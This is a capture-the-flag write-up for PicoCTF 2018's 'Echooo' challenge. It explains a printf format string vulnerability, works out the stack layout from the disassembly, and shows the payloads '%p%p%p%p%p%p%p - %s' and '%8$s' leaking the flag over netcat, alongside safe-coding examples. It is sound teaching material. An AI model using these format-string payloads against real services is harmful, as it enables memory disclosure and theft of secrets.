PicoCTF 2018 - Echooo

Note: This article is part of our PicoCTF 2018 BinExp Guide.

Spot the Bug

If you’re sick of the same old buffer overflow, here’s a new one for you. See if you can spot it:

while(1) {
  printf("> ");
  fgets(buf, sizeof(buf), stdin);
  printf(buf);
}

Yeah. That’s it - That’s the bug. We already know fgets is fine, so what’s left? … printf()!

Turns out printf is a powerful little beast, so much so that you mustn’t ever give control of the format string over to the user. This kind of vulnerability is known as a “format string vulnerability” - and it’s more powerful than it first appears.
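For contrast, here is a minimal sketch of the safe pattern: the format string is a constant, and the user's input is passed only as data. The helper name echo_safe is hypothetical and is not part of the challenge source.

```c
#include <stddef.h>
#include <stdio.h>

/* Hypothetical helper: copies user input into out without ever
 * treating it as a format string. Returns snprintf's result, i.e.
 * the number of characters the full output needs. */
int echo_safe(char *out, size_t out_size, const char *user_input) {
    /* The format string is fixed; user_input is only an argument. */
    return snprintf(out, out_size, "%s", user_input);
}
```

With this pattern, an input such as "%p%p %s" comes back unchanged instead of being interpreted. In the challenge loop, the equivalent fix would be printf("%s", buf).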

Strategy

So, how do we turn this printf into something that will print the flag? printf is a variadic function, one of the few in the C standard library, and probably the main reason that variadic functions are even a thing in C (you don’t see them very often in C code outside of the printf/scanf families). It takes a “format string”, and then any number of other arguments. The idea is that the format string identifies the number and type of the remaining arguments, allowing printf to print them out.

For instance, if you had a char* variable named “name”, pointing at the string “bob”, and you wrote the code printf("Hello %s!\n", name), it would print the string “Hello bob!\n”. The special token “%s” indicates to printf that the corresponding argument is a char*, and printf knows to “fill in” the token’s spot with the value that the argument points at.

Format strings can get quite complicated, and we needn’t discuss all of their features here, but what you need to know is that when printf sees a token, like “%s”, it consumes an argument of a given size (on 32-bit x86 a char* is 4 bytes), and then interprets that argument according to the token’s type (%s de-references the pointer and prints chars one at a time until it hits a null byte).
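To make the "one token consumes one argument" idea concrete, here is a toy formatter that understands only %s and %d. It is a sketch for illustration, not how any real printf is implemented; the names mini_format and clamp_written are hypothetical.

```c
#include <stdarg.h>
#include <stddef.h>
#include <stdio.h>

/* Clamp snprintf's "would have written" count to what actually fit. */
static size_t clamp_written(int n, size_t room) {
    if (n < 0) return 0;
    return (size_t)n < room ? (size_t)n : room - 1;
}

/* Hypothetical toy formatter: walks fmt and pulls one argument off
 * the va_list for every %s or %d token it meets. Returns the number
 * of characters written to out (excluding the null terminator). */
int mini_format(char *out, size_t out_size, const char *fmt, ...) {
    va_list args;
    size_t used = 0;

    if (out_size == 0) return 0;
    out[0] = '\0';

    va_start(args, fmt);
    for (const char *p = fmt; *p != '\0' && used + 1 < out_size; p++) {
        size_t room = out_size - used;
        if (p[0] == '%' && p[1] == 's') {
            /* %s: consume a pointer and print what it points at. */
            const char *s = va_arg(args, const char *);
            used += clamp_written(snprintf(out + used, room, "%s", s), room);
            p++; /* skip the 's' */
        } else if (p[0] == '%' && p[1] == 'd') {
            /* %d: consume an int and print it in decimal. */
            int v = va_arg(args, int);
            used += clamp_written(snprintf(out + used, room, "%d", v), room);
            p++; /* skip the 'd' */
        } else {
            /* Ordinary character: copy it through unchanged. */
            out[used++] = *p;
            out[used] = '\0';
        }
    }
    va_end(args);
    return (int)used;
}
```

Calling mini_format(out, sizeof(out), "Hello %s, you are %d!", "bob", 42) fills out with "Hello bob, you are 42!". Notice that nothing in the loop checks whether the caller really supplied an argument for each token: va_arg simply reads whatever comes next.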

Now, exactly what happens if you attempt to consume an argument that wasn’t actually passed in (or if you attempt to consume one argument as if it were an argument of an incompatible type)? This is referred to as undefined behavior, which means the compiler doesn’t have to care about that case, is free to assume it can’t happen, and can basically do whatever it wants if it ever does.

In practice, with gcc on a 32-bit x86 machine, printf will consume arguments by indexing into the stack. It will assume that those arguments were passed in immediately following the parameter for the format string, and interpret that memory as the arguments. The question becomes: what follows the argument for the format string in memory, and how can we use it to print the flag?

The general strategy here will be to analyze the content of the stack immediately before the printf function call, and identify whether there is a format string that would allow us to gain knowledge of the flag.

Background Info

First up, let’s see what stack variables there are in our program, and then we’ll look at the assembly and see how the stack is laid out.

char buf[64];
char flag[64];
char *flag_ptr = flag;

FILE *file = fopen("flag.txt", "r");
// ...
fgets(flag, sizeof(flag), file);

Here, we see that in addition to the buffer for the format string, there is also one for the flag. Interestingly, we also see an otherwise unused variable that is set to be a pointer to the flag (HINT HINT WINK WINK - We’ll circle back to that in a bit.)

Now, the stack layout:

mov    ebp,esp
push   ecx ; esp -= 4
sub    esp,0xa4 ; esp -= 0xa4
; ...
; char *flag_ptr = flag;
lea    eax,[ebp-0x4c] ; &flag = ebp-0x4c
mov    DWORD PTR [ebp-0x98],eax ; &flag_ptr = ebp-0x98
; ...
; fgets(flag, sizeof(flag), file);
push   DWORD PTR [ebp-0x90] ; file
push   0x40 ; sizeof(flag)
lea    eax,[ebp-0x4c] ; flag
push   eax
call   8048460 <fgets@plt>
; ...
; printf(buf);
sub    esp,0xc
lea    eax,[ebp-0x8c] ; &buf = ebp-0x8c
push   eax
call   8048450 <printf@plt>

Let’s make a table of some of the content we know has been reserved on the stack:

Address            Content
esp (= ebp-0xa8)   -
ebp-0x98           char* flag_ptr
ebp-0x90           FILE* file
ebp-0x8c           char buf[64]
ebp-0x4c           char flag[64]

Here we see the function reserves 0xa8 bytes on the stack. In practice, it seems to reserve everything it needs upfront, setting the baseline stack value to be ebp-0xa8. It then pushes arguments onto the stack to make function calls and removes them afterwards, always returning to the baseline level (and maintaining a 16 byte stack alignment for every function call).

Let’s look closer at the stack immediately before the printf call (after the arguments have been pushed, but before the call instruction has executed):

Start                          End                 Content
esp                            esp+3               &buf [4 bytes] (format string)
esp+4                          esp+15              alignment padding [12 bytes]
esp+16 = baseline = ebp-0xa8   esp+31 = ebp-0x99   other [16 bytes]
ebp-0x98                       ebp-0x95            char* flag_ptr

So, immediately following the format string argument are 12 bytes of alignment padding, 16 bytes of other content, and then the 4 byte pointer to the flag. In other words, there are 28 bytes and then a pointer to the flag. Since a pointer is 4 bytes, you could say that if you were to treat everything as pointers, then the 8th pointer following the format string would point to the flag (but the first 7 pointers would probably be junk).
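The arithmetic above can be double-checked with a short sketch. The constants are read off the disassembly; the function and constant names are hypothetical.

```c
/* Offsets are distances below ebp, taken from the disassembly. */
enum {
    BASELINE_OFFSET = 0xa8, /* esp after the prologue: ebp-0xa8 */
    PRINTF_ADJUST   = 0x10, /* sub esp,0xc plus the 4-byte push of &buf */
    FLAG_PTR_OFFSET = 0x98, /* flag_ptr lives at ebp-0x98 */
    WORD_SIZE       = 4     /* pointer size on 32-bit x86 */
};

/* Returns the 1-based index of the printf argument (counting from the
 * first one after the format string) that overlaps flag_ptr. */
int flag_ptr_arg_index(void) {
    /* esp just before the call instruction: ebp-0xb8. */
    int esp_below_ebp = BASELINE_OFFSET + PRINTF_ADJUST;
    /* The first argument after the format string sits at esp+4. */
    int first_arg_below_ebp = esp_below_ebp - WORD_SIZE;
    /* Bytes between that slot and flag_ptr: 12 padding + 16 other. */
    int gap_bytes = first_arg_below_ebp - FLAG_PTR_OFFSET;
    return gap_bytes / WORD_SIZE + 1;
}
```

The gap works out to 0xb4 - 0x98 = 0x1c = 28 bytes, so the function returns 28 / 4 + 1 = 8, matching the count above.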

We can now attempt to solve the challenge, but we should note that this is the first binary challenge that doesn’t give us direct access to the binary on the shell server. Our only interface is a socket that accepts I/O (this will become common later on, since if you have access to the binary you could always use something like gdb to force it to reveal its secrets). To solve this challenge, use netcat to connect to the server: nc 2018shell.picoctf.com 34802.

Exploitation

We know that we want the string pointed to by the 8th pointer following the format string. What we could use is a format string like this: “%p%p%p%p%p%p%p - %s”, which will print out the values of the first 7 pointers (they aren’t really pointers, but we’ll treat them as such), and then it will print out the “string” pointed to by the 8th pointer. We wouldn’t want to do something like this: “%s%s%s%s%s%s%s %s” because that would attempt to de-reference the first 7 pointers, and since those “pointers” probably aren’t valid, we could expect the program to crash.
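If you would rather generate the payload than type it, a small helper along these lines would do. This is a sketch, and build_payload is a hypothetical name; it emits one "%p" for every argument before the target and finishes with " - %s".

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: writes (index - 1) "%p" tokens followed by
 * " - %s" into out, so that %s lands on argument number index.
 * Returns 0 on success, or -1 if index is invalid or out is too small. */
int build_payload(char *out, size_t out_size, int index) {
    if (index < 1) return -1;

    /* 2 chars per "%p", 5 for " - %s", 1 for the null terminator. */
    size_t needed = (size_t)(index - 1) * 2 + 5 + 1;
    if (needed > out_size) return -1;

    out[0] = '\0';
    for (int i = 1; i < index; i++) {
        strcat(out, "%p"); /* print, but do not dereference, the junk */
    }
    strcat(out, " - %s");  /* dereference only the target pointer */
    return 0;
}
```

For index 8 this produces "%p%p%p%p%p%p%p - %s", which is 19 characters and fits comfortably in the 64-byte buf that the server reads into.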

Let’s try it out now:

$ nc 2018shell.picoctf.com 34802
Time to learn about Format Strings!
We will evaluate any format string you give us with printf().
See if you can get the flag!
> %p%p%p%p%p%p%p - %s
0x400xf77005a00x80486470xf7738a740x10xf77104900xffe47454 - picoCTF{===REDACTED===}

>

Yay, our analysis worked! The content of the flag buffer has been dumped and we now know the flag! Head back to the PicoCTF 2018 BinExp Guide to continue with the next challenge.

NOTE: There’s actually a “cleaner” way to solve this challenge if you know that the printf function supports a special POSIX extension to format strings (i.e. it works on most Unix-like systems, but not on Windows). Using it, you can index into a specific printf argument without having to print off everything that precedes it. If you add “n$” between the ‘%’ and the ‘s’, then printf will fetch the nth argument directly, interpret it as a pointer to a string, and print that string. In this case the format string “%8$s” is all that is needed to print only the flag and nothing but the flag. Try it out! We’ll use this trick in a couple of upcoming challenges.
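Here is a minimal sketch of positional arguments in a well-defined setting, assuming a POSIX-style libc such as glibc. The helper name pick_args is hypothetical. Both arguments are referenced, so this is ordinary, legitimate use of the extension rather than an exploit.

```c
#include <stddef.h>
#include <stdio.h>

/* Hypothetical helper: "%2$s" selects the second argument and
 * "%1$s" the first, regardless of the order they were passed in. */
int pick_args(char *out, size_t out_size) {
    return snprintf(out, out_size, "%2$s, %1$s", "first", "second");
}
```

After the call, out holds "second, first". The “%8$s” payload relies on the same indexing, except that the eighth "argument" is whatever happens to sit in that stack slot.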